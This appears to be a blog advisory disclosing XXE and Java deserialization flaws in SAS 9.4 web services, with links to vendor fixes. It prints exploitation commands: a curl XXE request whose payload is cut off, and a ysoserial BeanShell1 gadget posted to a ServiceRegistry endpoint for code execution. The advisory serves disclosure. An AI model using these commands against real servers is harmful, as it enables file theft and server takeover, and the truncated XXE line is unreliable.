Bridging the Security Gap
Multiple webservices on the SAS application are vulnerable to Java deserialization attacks and Unauthenticated XML External Entities in SAS BI Web Services 9.4
You can find the Dutch version of this post here
Unauthenticated XML External Entities in SAS BI Web Services 9.4
The rest endpoint /SASBIWS/rest/services is vulnerable to XML External Entity attacks. The REST services use an XML parser for processing the request. This parser has been configured in a way that it allows the interpretation of Document Type Definitions and the use of external (parameter) entities. Therefore the endpoint can be used to read content from external sources, including local files from the server running the REST services and/or files from other servers in the local network.
curl -i -s -k --data-binary ' %y; ]>
Informatie en fix: http://support.sas.com/kb/62/987.html
Unauthenticated Java deserialisatie in SAS Web Infra Platform and Search Interface to SAS Content
Multiple webservices on the SAS application are vulnerable to Java deserialization attacks. The SAS application contains webservices, from which some expect serialized Java objects as input. These endpoints do not validate if the input comes from a trusted source. Therefore these webservices can be used to deserialize arbitrary Java objects, which can lead to remote code execution and complete takeover of the server.
java -jar ysoserial.jar BeanShell1 "nslookup rcetest.[target].com"
curl -i -s -k —data-binary sas_beanshell.txt -X $'POST' https://[target]/SASWIPClientAccess/remote/ServiceRegistry -H "Content-type: application/java"
Informatie en fix: https://support.sas.com/kb/63/391.html
A third reflected Cross-Site Scripting SAS Logon Manager 9.4